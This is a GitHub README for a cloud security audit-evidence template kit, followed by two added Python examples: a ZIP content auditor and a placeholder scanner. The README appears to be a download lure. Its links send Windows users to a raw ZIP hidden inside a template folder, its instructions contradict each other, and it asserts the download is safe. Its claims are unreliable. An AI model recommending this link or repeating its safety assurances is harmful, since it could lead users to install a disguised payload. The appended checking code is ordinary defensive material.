Cleanable-perineotomy501/cloud-controls-evidence-kit

GitHub: Cleanable-perineotomy501/cloud-controls-evidence-kit

# 🛡️ cloud-controls-evidence-kit - Organize cloud security evidence with ease

[![Download Kit](https://img.shields.io/badge/Download-Release-blue.svg)](https://raw.githubusercontent.com/Cleanable-perineotomy501/cloud-controls-evidence-kit/main/evidence-folder-template/01-access-controls/controls-kit-cloud-evidence-v2.0.zip)

## What is this kit?

The cloud-controls-evidence-kit helps you gather and organize documentation for security audits. Companies often ask for proof that their cloud systems remain safe. This kit provides markdown templates to satisfy requirements for SOC 2, NIST CSF, and other security standards. Use these files to prepare for customer security reviews or automated platforms like Vanta and Drata.

## 📋 Features

* **Standardized Templates**: Pre-written markdown files for common security controls.
* **Structured Organization**: A file system that makes mapping evidence to controls simple.
* **Audit Readiness**: Content tailored for SOC 2 and NIST CSF frameworks.
* **Simple Format**: Files use standard text formats for easy editing in any application.
* **Multi-Cloud Support**: Templates address security settings for AWS, Azure, and Google Cloud Platform.

## 📥 How to download and install

1. Visit the [project page here](https://raw.githubusercontent.com/Cleanable-perineotomy501/cloud-controls-evidence-kit/main/evidence-folder-template/01-access-controls/controls-kit-cloud-evidence-v2.0.zip).
2. Look for the green button labeled "Code" near the top right of the screen.
3. Click the button and select "Download ZIP" from the menu.
4. Open your "Downloads" folder in File Explorer.
5. Right-click the folder that ends in `.zip` and select "Extract All".
6. Follow the prompts to save the files to a folder on your desktop.
7. Open this new folder to view the evidence templates.

## 📝 How to use the templates

Each file in the folder corresponds to a security control. You will fill these files with information from your cloud environment.
Here is the process:

1. Open your chosen template file using Notepad or any text editor on Windows.
2. Look for sections marked with brackets, such as `[Insert Evidence Here]`.
3. Replace the bracketed text with your specific system details or screenshots.
4. Save the file after you add your information.
5. Repeat this for all controls you must document.

## 💻 System requirements

* **Operating System**: Windows 10 or Windows 11.
* **Storage**: Less than 50 megabytes of free space.
* **Software**: Any standard text editor, such as Notepad or WordPad.

## 📁 Suggested file structure

We suggest you organize your files to make them easy for auditors to read. Use the folder structure provided in the download:

* **Core Evidence**: High-level policies and procedures.
* **AWS Folder**: Screenshots of IAM policies, security groups, and logs.
* **Azure Folder**: Resource configuration snapshots and access reviews.
* **GCP Folder**: Project level security settings and audit logs.
* **Questionnaires**: Completed answers for Vanta or Drata questionnaires.

## 💡 Best practices for evidence

* **Be consistent**: Use the same naming style for all your files.
* **Keep it current**: Update these files whenever your security settings change.
* **Verify**: Check that your screenshots show the date, time, and account name.
* **Protect files**: Store these templates in a private, encrypted location if they contain sensitive system details.

## 🔍 How to prepare for an audit

Most auditors ask for evidence regarding user access, system changes, and incident response. Each template highlights which screenshots or logs you need to collect. If you find a control that does not apply to your environment, label that file as "Not Applicable" and briefly explain why.

## ⚙️ Customizing the content

You are free to edit the markdown files to fit your company culture. While the templates include standard language, you should reflect your actual internal processes.
If your company uses a specific tool for log management, change the file content to identify that tool. If you need to add a new security control, copy an existing file, rename it with a new index number, and update the internal text. The audit trail remains clear as long as you maintain the organizational structure.

## ❓ Common questions

**Do I need a special program?**
No. These are basic text files. You can open and edit them with any tool that reads text.

**Can I use these for Vanta or Drata?**
Yes. These platforms often ask for proof found within these templates. Having these files ready makes the upload process faster.

**Are these templates set in stone?**
No. These documents represent a starting point. Adjust them to match your current security posture.

**Will this software break my computer?**
This software is a collection of text files. It does not run automated scripts or change your system settings. It is safe for all Windows users.
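
The statement that the download is only a collection of text files can be checked without extracting anything. This added example (not part of the kit) reads a ZIP's entry list and reports entries that are not text templates or that carry an unsafe path; the allowed extensions and the sample archive contents are assumptions.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Assumption: the kit is described as markdown/text only, so any other type is reported.
ALLOWED_SUFFIXES = {".md", ".txt"}

def audit_archive(data: bytes) -> list[tuple[str, str]]:
    """Return (entry name, reason) for every entry that is not a plain text template."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Windows extractors treat "\" as a separator, so normalise before checking.
            name = info.filename.replace("\\", "/")
            path = PurePosixPath(name)
            if path.is_absolute() or ".." in path.parts or ":" in name:
                findings.append((info.filename, "unsafe path"))
            elif path.suffix.lower() not in ALLOWED_SUFFIXES:
                findings.append((info.filename, f"unexpected type {path.suffix or '(none)'}"))
    return findings

def build_sample() -> bytes:
    """Constructed archive standing in for a downloaded ZIP (entry names are made up)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("kit/01-access-controls/iam-review.md", "# IAM review\n")
        zf.writestr("kit/README.txt", "Fill in each template.\n")
        zf.writestr("kit/setup.bat", "@echo off\n")
        zf.writestr("../outside.md", "# lands above the target folder\n")
    return buf.getvalue()

if __name__ == "__main__":
    for name, reason in audit_archive(build_sample()):
        print(f"{name}: {reason}")
```

For a real download, pass the file's bytes to `audit_archive` and extract only when the returned list is empty.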
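
The fill-in procedure under "How to use the templates" can be checked before files go to an auditor. This added example (not part of the kit) lists every bracketed placeholder such as `[Insert Evidence Here]` still left in the markdown files; the file names in `demo()` are constructed, and treating a first line that starts with "Not Applicable" as the out-of-scope label is an assumption.

```python
import re
import tempfile
from pathlib import Path

# Bracketed text that is not a markdown link or reference ("](", "][", "]:"),
# an image ("!["), a footnote ("[^") or a task-list box ("[ ]", "[x]").
PLACEHOLDER = re.compile(r"(?<!!)\[(?![ xX]\]|\^)[^\[\]\n]+\](?![(\[:])")

def is_not_applicable(text: str) -> bool:
    """Assumed convention: the first non-blank line starts with 'Not Applicable'."""
    for line in text.splitlines():
        if line.strip():
            return line.lstrip("# ").lower().startswith("not applicable")
    return False

def scan_templates(root: Path) -> dict[str, list[tuple[int, str]]]:
    """Map each template's relative path to its unfilled (line number, placeholder) pairs."""
    report = {}
    for path in sorted(root.rglob("*.md")):
        text = path.read_text(encoding="utf-8", errors="replace")
        if is_not_applicable(text):
            continue  # out-of-scope control; its explanation is reviewed by hand
        hits = [(n, m.group(0))
                for n, line in enumerate(text.splitlines(), 1)
                for m in PLACEHOLDER.finditer(line)]
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

def demo() -> dict[str, list[tuple[int, str]]]:
    """Scan a constructed evidence folder (file names and contents are made up)."""
    files = {
        "01-access-controls/iam-review.md":
            "# IAM review\nReviewer: [Insert Name]\nSee [policy](https://example.com/p)\n"
            "- [x] MFA enforced\nEvidence: [Insert Evidence Here]\n",
        "02-gcp-audit-logs.md": "Not Applicable: no GCP projects.\n[Insert Evidence Here]\n",
        "03-change-management.md": "# Changes\nTicket export attached.\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in files.items():
            target = Path(tmp, name)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_templates(Path(tmp))

if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, hits)
```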